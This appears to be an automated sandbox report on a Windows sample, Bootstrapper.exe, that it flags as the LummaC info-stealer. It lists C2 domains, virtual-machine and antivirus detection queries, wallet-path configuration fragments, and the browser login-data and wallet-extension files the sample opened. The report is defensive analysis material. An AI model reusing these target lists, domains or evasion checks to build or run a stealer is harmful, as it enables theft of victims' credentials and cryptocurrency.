Source: Bootstrapper.exe, 00000000.00000003.2394723847.0000000002935000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Bootstrapper.exe, 00000000.00000003.2449638964.00000000089F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Bootstrapper.exe, 00000000.00000003.2449638964.00000000089F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Bootstrapper.exe, 00000000.00000003.2449638964.00000000089F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Bootstrapper.exe, 00000000.00000003.2449638964.00000000089F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Bootstrapper.exe, 00000000.00000003.2449638964.00000000089F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49801 version: TLS 1.2

Source: C:\Users\user\Desktop\Bootstrapper.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_2_007BE180 NtAllocateVirtualMemory,		0_2_007BE180
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_2_007BE6C0 NtProtectVirtualMemory,NtProtectVirtualMemory,		0_2_007BE6C0

Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_2_007C1040	0_2_007C1040
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_2_00737010	0_2_00737010
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_2_00721000	0_2_00721000
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_2_007F51D0	0_2_007F51D0
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_2_007D01A0	0_2_007D01A0
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_2_0073D180	0_2_0073D180
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_2_0073B300	0_2_0073B300
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_2_007C4300	0_2_007C4300
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_2_00734470	0_2_00734470
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_2_007F9470	0_2_007F9470
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_2_007DC4E0	0_2_007DC4E0
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_2_007A24D0	0_2_007A24D0
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_2_007C5570	0_2_007C5570
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_2_007255A0	0_2_007255A0
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_2_0073C5A0	0_2_0073C5A0
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_2_00738630	0_2_00738630

Source: C:\Users\user\Desktop\Bootstrapper.exe

Code function: String function: 00791E90 appears 72 times

Source: Bootstrapper.exe, 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameDisufranchisemeant.exeD$ vs Bootstrapper.exe
Source: Bootstrapper.exe, 00000000.00000003.2344349109.0000000002295000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDisufranchisemeant.exeD$ vs Bootstrapper.exe
Source: Bootstrapper.exe	Binary or memory string: OriginalFilenameDisufranchisemeant.exeD$ vs Bootstrapper.exe

Source: Bootstrapper.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1

Source: Bootstrapper.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Bootstrapper.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Bootstrapper.exe, 00000000.00000003.2394858864.0000000002905000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\Bootstrapper.exe

File read: C:\Users\user\Desktop\Bootstrapper.exe

Jump to behavior

Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Bootstrapper.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Bootstrapper.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Bootstrapper.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Bootstrapper.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Bootstrapper.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Bootstrapper.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Bootstrapper.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: Bootstrapper.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Admin\Workspace\3927856\Project\Release\Project.pdb source: Bootstrapper.exe

Source: Bootstrapper.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Bootstrapper.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Bootstrapper.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Bootstrapper.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Bootstrapper.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: Bootstrapper.exe

Static PE information: section name: .fptable

Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E0D4F push esi; retf	0_3_016E0D50
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E0D4F push esi; retf	0_3_016E0D50
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E0D4F push esi; retf	0_3_016E0D50
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E0D4F push esi; retf	0_3_016E0D50
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E0D4F push esi; retf	0_3_016E0D50
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E654A push ecx; retf	0_3_016E6570
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E654A push ecx; retf	0_3_016E6570
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E654A push ecx; retf	0_3_016E6570
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E654A push ecx; retf	0_3_016E6570
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E654A push ecx; retf	0_3_016E6570
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016C14AE push edi; retf	0_3_016C14C1
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016C14AE push edi; retf	0_3_016C14C1
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016C09A8 push esp; retf	0_3_016C09A9
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016C09A8 push esp; retf	0_3_016C09A9
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016C14AE push edi; retf	0_3_016C14C1
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016C14AE push edi; retf	0_3_016C14C1
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016C09A8 push esp; retf	0_3_016C09A9
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016C09A8 push esp; retf	0_3_016C09A9
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E0D4F push esi; retf	0_3_016E0D50
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E0D4F push esi; retf	0_3_016E0D50
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E0D4F push esi; retf	0_3_016E0D50
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E0D4F push esi; retf	0_3_016E0D50
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E0D4F push esi; retf	0_3_016E0D50
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E654A push ecx; retf	0_3_016E6570
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E654A push ecx; retf	0_3_016E6570
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E654A push ecx; retf	0_3_016E6570
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E654A push ecx; retf	0_3_016E6570
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E654A push ecx; retf	0_3_016E6570
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E0D4F push esi; retf	0_3_016E0D50
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E0D4F push esi; retf	0_3_016E0D50
Source: C:\Users\user\Desktop\Bootstrapper.exe	Code function: 0_3_016E0D4F push esi; retf	0_3_016E0D50

Source: C:\Users\user\Desktop\Bootstrapper.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Bootstrapper.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Bootstrapper.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Bootstrapper.exe

API coverage: 5.2 %

Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 3332	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 3332	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\Bootstrapper.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Bootstrapper.exe

Code function: 0_2_00795070 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,

0_2_00795070

Source: C:\Users\user\Desktop\Bootstrapper.exe

Code function: 0_2_00785650 GetSystemInfo,

0_2_00785650

Source: Bootstrapper.exe, 00000000.00000003.2549756162.000000000164C000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550498182.000000000164C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: Bootstrapper.exe, 00000000.00000003.2549705000.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.0000000001694000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2480264844.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2541980886.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502138943.0000000001694000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550627340.0000000001695000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Bootstrapper.exe, 00000000.00000003.2549705000.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.0000000001694000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2480264844.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2541980886.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502138943.0000000001694000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550627340.0000000001695000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW/}

Source: C:\Users\user\Desktop\Bootstrapper.exe

API call chain: ExitProcess graph end node

graph_0-10188

Source: C:\Users\user\Desktop\Bootstrapper.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Bootstrapper.exe

Code function: 0_2_0077C670 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0077C670

Source: C:\Users\user\Desktop\Bootstrapper.exe

Code function: 0_2_007BE890 mov eax, dword ptr fs:[00000030h]

0_2_007BE890

Source: C:\Users\user\Desktop\Bootstrapper.exe

Code function: 0_2_00737010 GetProcessHeap,GetStdHandle,GetCurrentThread,

0_2_00737010

Source: C:\Users\user\Desktop\Bootstrapper.exe

Code function: 0_2_0077C670 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0077C670

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Bootstrapper.exe	String found in binary or memory: hummskitnj.buzz
Source: Bootstrapper.exe	String found in binary or memory: cashfuzysao.buzz
Source: Bootstrapper.exe	String found in binary or memory: appliacnesot.buzz
Source: Bootstrapper.exe	String found in binary or memory: screwamusresz.buzz
Source: Bootstrapper.exe	String found in binary or memory: inherineau.buzz
Source: Bootstrapper.exe	String found in binary or memory: scentniej.buzz
Source: Bootstrapper.exe	String found in binary or memory: rebuildeso.buzz
Source: Bootstrapper.exe	String found in binary or memory: prisonyfork.buzz
Source: Bootstrapper.exe	String found in binary or memory: dxkushha.com

Source: C:\Users\user\Desktop\Bootstrapper.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Bootstrapper.exe

Code function: 0_2_0077C440 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_0077C440

Source: C:\Users\user\Desktop\Bootstrapper.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Bootstrapper.exe, 00000000.00000003.2549705000.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.0000000001694000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2551440466.0000000002902000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502138943.000000000167C000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2549826611.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2541980886.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502138943.0000000001694000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502391629.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550627340.0000000001695000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\Bootstrapper.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Bootstrapper.exe PID: 5416, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Bootstrapper.exe	String found in binary or memory: x\\IndexedDB","m":[""],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":[""],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electru
Source: Bootstrapper.exe	String found in binary or memory: s/ElectronCash
Source: Bootstrapper.exe	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: Bootstrapper.exe	String found in binary or memory: window-state.json
Source: Bootstrapper.exe, 00000000.00000003.2480264844.0000000001695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Bootstrapper.exe, 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ,"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":[""],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":
Source: Bootstrapper.exe	String found in binary or memory: Wallets/Ethereum
Source: Bootstrapper.exe, 00000000.00000003.2480224915.00000000016DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Bootstrapper.exe, 00000000.00000003.2480264844.000000000167C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
